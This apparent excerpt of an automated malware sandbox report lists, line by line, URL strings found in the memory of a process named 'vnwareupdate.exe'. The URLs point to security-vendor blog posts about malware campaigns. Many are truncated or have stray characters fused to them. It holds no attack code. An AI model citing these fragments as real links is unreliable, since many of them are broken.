Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distri
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distriNew
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distriSkygofree:
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/botnets/2015/08/whos-behind-your-proxy-uncovering-
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/botnets/2015/08/whos-behind-your-proxy-uncovering-NitlovePOS:
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/botnets/2015/08/whos-behind-your-proxy-uncovering-Operation
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/botnets/2015/08/whos-behind-your-proxy-uncovering-Uncovering
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/exploits-2/2015/05/unusual-exploit-kit-targets-chi
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/exploits-2/2015/05/unusual-exploit-kit-targets-chiRTF
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/exploits-2/2015/05/unusual-exploit-kit-targets-chiUnusual
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-e
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/intelligence/2015/06/unusual-exploit-kit-targets-c
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/intelligence/2015/06/unusual-exploit-kit-targets-cDyre
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/intelligence/2015/06/unusual-exploit-kit-targets-cUnusual
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/intelligence/2015/12/inside-chimera-ransomware-the
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/intelligence/2016/03/maktub-locker-beautiful-and-d
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/malvertising-2/2015/11/the-casino-malvertising-cam
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/malvertising-2/2015/12/spike-in-malvertising-attac
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.org/threat-analysis/exploits-threat-analysis/2016/04/a
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massi
Source: vnwareupdate.exe, 00000003.00000002.516989975.00000000021F1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massiFlash
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.nviso.be/2018/08/02/powershell-inside-a-certificate-part-3/
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-ov
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-ov:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-ovSamSam
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-OH-Worm
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-OPoS
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-PoS
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-arPoS
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-nPoS
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-oPoS
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-rPoS
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/a-peek-inside-a-pos-sPoS
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu.gDeciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu/gDeciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu0
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu1BDeciphering
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu2
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu22Deciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu43Deciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu52Deciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu70Deciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciu89NEW
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuA9Deciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuAPDeciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuClDeciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuCyDeciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuDCSO
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuDeciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciud
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuf
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciunSDeciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuppDeciphering
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciups://goo.gl/CywXnS
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-tar
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-tarLazarus
Source: vnwareupdate.exe, 00000003.00000002.516989975.00000000021F1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaig
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulner
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerDrive-by
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerFalse
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerOracle
Source: vnwareupdate.exe, 00000003.00000002.516989975.00000000021F1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnere
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/struts-dotnetnuke-se
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/struts-dotnetnuke-seFlash
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apac
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apac0Vulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apac1Vulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apac2Vulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apac6Vulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apac7Vulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apac9Vulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apacDragonOK
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apacEspionage
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apacH
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apacIVulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apacTVulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apacVulnerabilities
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-co
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-coCARBANAK
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-coCarbon
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/dridex-shadows-blacklisting-stealth-a
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/jaff-enters-ransomware-scene-locky-st
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/jaff-enters-ransomware-scene-locky-stJaff
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigbo
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-.gNEW
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-0
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-99NEW
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-CyNEW
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-FEA
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismu
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-d
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dTracking
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dUDPOS
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/ursnif-variant-found-using-mouse-move8
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/ursnif-variant-found-using-mouse-moveMalumPoS:
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/ursnif-variant-found-using-mouse-moveUrsnif
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-custo
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-custoChinese
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-custoZEUS
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/android-malware-clicker-dgen-found-google-p
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/android-malware-clicker-dgen-found-google-pActor
Source: vnwareupdate.exe, 00000003.00000003.244930410.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/evoltin-pos-malware-attacks-via-macro
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-system
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacksNetwire
Source: vnwareupdate.exe, 00000003.00000003.241767951.0000000005691000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/Lurk:
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/Rovnix
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/targeted-attack-campaign-indian-organizatio
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/targeted-attack-campaign-indian-organizatioSpearphishing
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.mcafee.com/mcafee-labs/targeted-attack-campaign-indian-organizatioTerracotta
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/cat-phishing/
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/cat-phishing/Cat
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/cat-phishing/New
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/peering-into-glassrat/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/Operation
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/Peering
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdf
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdf2RSA
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdf8
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdf9bOperation
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdfDarkhotel
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdfOperation
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdfR
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdfRRSA
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdfRSA
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdfcRSA
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/05/RSA-IR-Case-Study.pdfchRSA
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/08/Terracotta-VPN-Report-Final-8-3
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/08/Terracotta-VPN-Report-Final-8-39Terracotta
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/08/Terracotta-VPN-Report-Final-8-3Digitally
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/08/Terracotta-VPN-Report-Final-8-3Terracotta
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://blogs.rsa.com/wp-content/uploads/2015/08/Terracotta-VPN-Report-Final-8-3The
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-p
